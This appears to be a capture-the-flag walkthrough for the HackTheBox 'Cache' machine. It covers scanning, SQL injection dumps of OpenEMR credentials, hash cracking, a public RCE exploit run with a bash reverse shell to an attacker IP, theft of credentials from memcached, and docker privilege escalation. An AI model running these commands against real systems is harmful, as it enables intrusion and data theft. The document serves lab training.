Cache HackTheBox Walkthrough
This is Cache HackTheBox Walkthrough. In this walkthrough I will demonstrate step by step procedure how I rooted to Cache HackTheBox machine. Cache is a Linux machine with IP address
10.10.10.188 and is given difficulty level
medium by its maker. Let’s begin. Connect your machine with VPN and confirm by pinging the IP 10.10.10.188.
I started by scanning the IP 10.10.10.188 so that I could get some starting point to proceed.
Nmap [a popular port scanner] gave the following result.
$nmap -sV -sC -oA scan 10.10.10.188
Nmap revealed that ports 22, 80, and 30000 are open and
Apache Web Server, and
Memcached [a general purpose distributed memory-caching system] services are running over them respectively. After going to URL http://10.10.10.188/author.html found a name
ash. Added it to my notes as it may be a user of the box. Nothing interesting found so tried to
directory brute force.
Directory brute forcing
$dirsearch -u 10.10.10.188 -e all -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
Directory brute forcing revealed two folders
From above file got the credential
ash: [email protected]_fun
Used the credential at URL
http://10.10.10.188/login.html. After login got nothing interesting except an image of magician
Tried to create custom wordlist using cewl.
Custom Wordlist Create
$cewl -w custom_wordlist.txt -d 10 -m 1
WFUZZ for domain names with the custom wordlist which we have created.
Fuzzing For domain
$ wfuzz -w custom_wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193
302 response at word
hms.htb to my
/etc/hosts file in case if there is
Virtual Hosting enabled we can get something more to enumerate.
Hosts file before modification
Hosts file after modification
http://hms.htb found that it is running
OpenEMR software [a medical practice management software which also supports Electronic Medical Record] is running and it redirected me to the login page http://hms.htb/interface/login/login.php?site=default. Tried to login with default credential
admin: pass, but could not login.
Tip: During CTF hunting and penetration testing whenever you get any popular software or web app always try to login with default credential because sometimes administrator forget to change its default credentials.
As I found any
known software then my next step is to find its
version so that I could get information about public exploit. After a lot of enumeration couldn’t get its version. At the footer of the login page at http://hms.htb/interface/login/login.php?site=default got
copyright information is outdated.
So I am guessing that this software was last updated in 2018. And
public exploit before 2018 may work on it. After seeing the
release history it appears that the current version is
5.0.1 or less than this.
As soon as I get the software name and its version my next step is to find the available public exploit.
Searching Public Exploit
$searchsploit openemr 5.0.1
Searchsploit gives there is an
authenticated RCE. So, we require
Password of the openEMR software to get
Remote Code Execution. After some googling got this file on openEMR website https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf which reveals that OpenEMR 5.0.1 has multiple vulnerability. And SQL Injection was among them.
According to pdf file there is a GET based
SQL injection vulnerability at URL http://hms.htb/portal/add_edit_event_user.php?eid=1. I recommend you to read the pdf file to know more.
Dump username and password
Capture request in file named
request.txt using burp suite
$sqlmap -r request.txt --dbs --batch
$sqlmap -r request.txt -D openemr --tables
$sqlmap -r request.txt -D openemr -T users_secure --dump
Got the credential
openemr_admin : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
from the database
openemr. After identifying the hash got that it is
Cracked the hash using
$git clone https://github.com/BREAKTEAM/Debcrypt.git
So the Credential is
openemr_admin: xxxxxx [six times small x]
Tip: Always try to use tool which is assigned for dedicated work rather than using those tool which is for many number of operations. This will increase the efficiency and accuracy. For example to crack bcrypt hash I have used Debcrypt, a tool to crack bcrypt hash rather than using Hashcat or JohnTheRipper
Since we already know that there is an authenticated RCE exploit exists for openemr software. Let’s use it by
mirroring it on our PC from
$searchsploit openemr 5.0.1
$searchsploit -m exploits/php/webapps/45161.py
$mv 45161.py openemr_rce.py
$nc -nvlp 1234 // In separate window
$python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c '/bin/bash -i >& /dev/tcp/10.10.14.44/1234 0>&1'
Upgrade the shell to fully qualified Linux Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
Got two users
/home/ directory. Easily switched to user ash using
$su ash. Enter the creds which we have captured from http://10.10.10.188/jquery/functionality.js file i.e.,
Password: [email protected]_fun
Grab User Flag
Tried to run
$sudo -l to check if ash has any special permission, but got error because user ash is not configured inside
linpeas.sh [a post exploitation enumeration script] revealed that user
luffy is the part of
docker privilege escalation found this and this interesting articles. But the problem is this that docker can only be run by user
luffy because luffy is part of docker group. And we can’t switch to luffy using
$su luffy because we don’t have it’s credential. So we need the
password of luffy. Wait, we have
memcached server running on port
Penetration testing on memcached server found this article . Followed the steps as discussed in the article and got the credentials of luffy.
Remember all these steps are needed to be done on remote cache machine.
$netstat -alnop revealed that memcached server is listening on port
11211 locally. So we have to connect to it using
telnet to get some information.
$telnet 127.0.0.1 11211
~stats cachedump 1 0
So the credential is
luffy: 0n3_p1ec3. Exit from the telnet and switched the user to luffy.
$docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
to get root.
Capture Root Flag
This is how I rooted to the cache machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Having any issue feel free to comment us. Want to give any suggestion please write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com